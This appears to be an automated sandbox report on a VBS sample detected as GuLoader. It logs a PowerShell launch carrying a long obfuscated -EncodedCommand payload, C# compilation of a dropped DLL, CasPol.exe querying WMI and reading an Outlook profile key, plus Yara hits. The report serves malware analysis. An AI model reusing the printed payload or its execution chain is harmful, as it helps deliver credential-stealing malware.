Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "JABNAGkAbABqAHYAcgBuAGUAdABsACAAPQAgAEAAJwANAAoASQBtACQASABhAHUAUwB0AHYAQQBzAG8ARwByAHIARgBpADkAVABpACAAQgBpAD0AYQBmACAAQQBmACIAQQBmAFYARABpAGkAUgBlAHIAUwBwAHQAQQBmAHUATABvAGEAUgBlAGwASwBhAEEAUAB0AGwAQQBnAGwAUgBlAG8AUgBlAGMAUABoACIACgBTAHQAQQBLAG8AZABDAGgAZABMAHUALQBCAG8AVABJAGQAeQBsAGUAcABSAGkAZQBBAG4AIABlAHEALQBTAGsAVABOAGUAeQBVAG4AcABFAHMAZQBTAHQARABDAGEAZQBPAHAAZgBWAGUAaQBQAG8AbgBEAGUAaQBJAGQAdABTAHQAaQBBAHQAbwBOAG8AbgBLAGUAIABDAGgAQABWAGUAIgAKAHUAZAB1AEYAbwBzAFIAZQBpAEEAawBuAGEAZgBnAEEAcwAgAEwAZQBTAE8AcAB5AEMAeQBzAFMAZQB0AEQAaQBlAEEAbgBtAFAAcgA7AAoAdABpAHUARgBhAHMAQQBwAGkASQBuAG4AbwBwAGcASQBuACAAQgBhAFMATwBwAHkAQQBrAHMAVQBuAHQAVgBpAGUATQBlAG0AVgBlAC4AdgBlAFIAbwB2AHUAQwBvAG4AZQB4AHQAVABhAGkARABpAG0ATABhAGUAUwB0AC4AVgBlAEkAQgBpAG4ASwBvAHQARwBvAGUAQwBpAHIAQQBuAG8ARgBsAHAAWQBvAFMAVABoAGUAVQBuAHIAZQBpAHYAVQBkAGkARwBzAGMAUwBoAGUAUgBvAHMAUABsADsACgBPAHAAcABTAHkAdQBSAGEAYgBGAGEAbABNAGEAaQBXAGkAYwB1AG4AIABBAHUAcwBJAG4AdABQAG8AYQBVAHAAdABTAGEAaQBHAHIAYwBEAG8AIABzAGsAYwByAGkAbABNAGkAYQBXAG8AcwBGAHIAcwBpAG4AIABTAHQAQwBHAGkAbABWAG8AYQBTAHUAZABJAG4AbwBNAHkAZwBHAHQAZQBTAHQAbgBBAHIAZQBGAGEAdABMAG8AMQAKAFMAcAB7AEEAcwBbAEcAbgBEAGIAZQBsAFUAbgBsAEIAdQBJAEYAeQBtAEQAbwBwAEYAYQBvAFYAZQByAFQAcgB0AFUAbgAoAFAAaAAiAEsAZQB1AFUAaQBzAFMAdQBlAFAAcwByAEYAbgAzAEEAcAAyAHMAawAiAHQAcgApAEcAcgBdAEUAbgBwAFAAaQB1AE8AcABiAFMAdABsAHMAYQBpAFMAcABjAFYAaQAgAFMAdQBzAFAAbwB0AEgAYQBhAFMAawB0AEIAZQBpAFMAYwBjAFUAbgAgAEQAaQBlAEUAcgB4AFAAdQB0AFMAdgBlAEEAcgByAFcAYQBuAEkAbgAgAEcAZwBpAFAAZQBuAE0AYQB0AFUAbgAgAHQAcgBDAFAAaQByAEEAYQBlAEQAZQBhAFMAbAB0AFMAdABlAEsAbABNAEIAdQBEAFAAbABJAGkAbgBXAFUAbgBpAEUAbABuAHMAdABkAFIAZQBvAFYAYQB3AE0AYQAoAEwAYQBpAEEAbgBuAFMAawB0AFMAdAAgAEIAZQBOAEYAbAB2AFUAbgBoAEkAcgBpAEUAbQBlAEMAbwAsAEEAbgBpAEMAaABuAFAAcgB0AEQAaQAgAEYAbwBIAEwAYQBlAEsAbABhAEIAZQAsAGQAcgBpAFQAYQBuAEYAbwB0AEIAZQAgAFIAZQBoAFAAYQBhAEYAbwB0AGEAZgBjAEIAcgBoAFQAcgAsAEwAYQBpAEIAcgBuAEYAbwB0AFQAZQAgAFUAbgBQAFQAbwBpAEIAbwBuAE0AYQBpAEQAaQAsAE0AZQBpAE4AbwBuAEYAagB0AEMAaAAgAGQAdQBPAE0AYQB2AEgAZQBlAE8AcgByAFMAYQBpAFMAbAAsAEYAbwBpAE4AYQBuAHIAZQB0AE8AdgAgAFAAZQBSAHUAbgBlAEEAbgBjAE8AYgBpAE0AbwB0AEUAbABhAHAAYQAsAFIAZQBpAFMAYQBuAEMAYQB0AEgAYQAgAFAAcgBPAEcAbwBwAEEAdQBrAFMAbgByAE4AbwAsAEIAcgBpAG0AYQBuAEkAbgB0AEQAYQAgAEEAdQBDAFIAaQByAFAAcgBvAEgAYQBjAEgAZQBrAHMAawAsAGEAawBpAFIAdQBuAEgAeQB0AE0AZQAgAE0AYQBBAFAAaAB1AE4AYQB0AFkAbwBvAEEAcwBzAFMAZAAsAEcAdQBpAEEAZgBuAEEAcAB0AFMAawAgAFUAbgBSAFAAbABlAEEAZgB0AFMAawByAFcAcgApAE8AcAA7AAoARwBsAFsAVABhAEQAVABlAGwASABvAGwAQQBuAEkARABvAG0AUwBuAHAATgBvAG8AYQB1AHIAUwBrAHQATwBjACgARwBsACIATABpAHcASAB5AGkAUwBhAG4ATwBiAG0AYQBjAG0AQgBhAC4AUwBtAGQAcABoAGwATwBuAGwAUABhACIAYQBsACkARQB4AF0AQQByAHAATQBvAHUAUwBpAGIAQQBhAGwAVABlAGkARABpAGMAUgBpACAAUwB0AHMARABlAHQATQBlAGEAQwB1AHQAQgBlAGkAVABoAGMATABhACAAQwBvAGUARABhAHgARQByAHQAdABvAGUAVABhAHIAQQBtAG4AUgB1ACAAQQByAGkARwByAG4ARwByAHQATABvACAAaABlAEcATABlAGUAVABhAHQAQQBxAEQARQBrAHIATQB5AGkARABvAHYAagBvAGUASABvAHIATA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA2B2.tmp" "c:\Users\user\AppData\Local\Temp\sepi5xx1\CSC7F7A267C826A46D5AA3589EC91649B9.TMP"

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fo0nlcmw.oxc.ps1

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winVBS@12/12@3/3

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9100:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9100:120:WilError_03

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PUMP mt310143121.vbs"

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 0000001A.00000000.1970106356.0000000001350000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2220743788.0000000009E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08508928 push eax; retf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_088C5360 push es; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08B6C2A1 push eax; mov dword ptr [esp], edx
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08B63AF0 push eax; mov dword ptr [esp], edx
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08B6CD80 pushad ; retf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08B640E8 push eax; mov dword ptr [esp], edx
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08B6E670 push eax; mov dword ptr [esp], ecx
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08C6F8A8 push ebp; retf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08C6F8B8 push esi; retf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08C68168 push eax; retf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08C68297 push esi; retf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08C61410 push es; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08C6EEA0 push ecx; retf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_20B08612 push 8BFFFFFFh; retf

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.cmdline

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

File created: C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.dll

Jump to dropped file

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
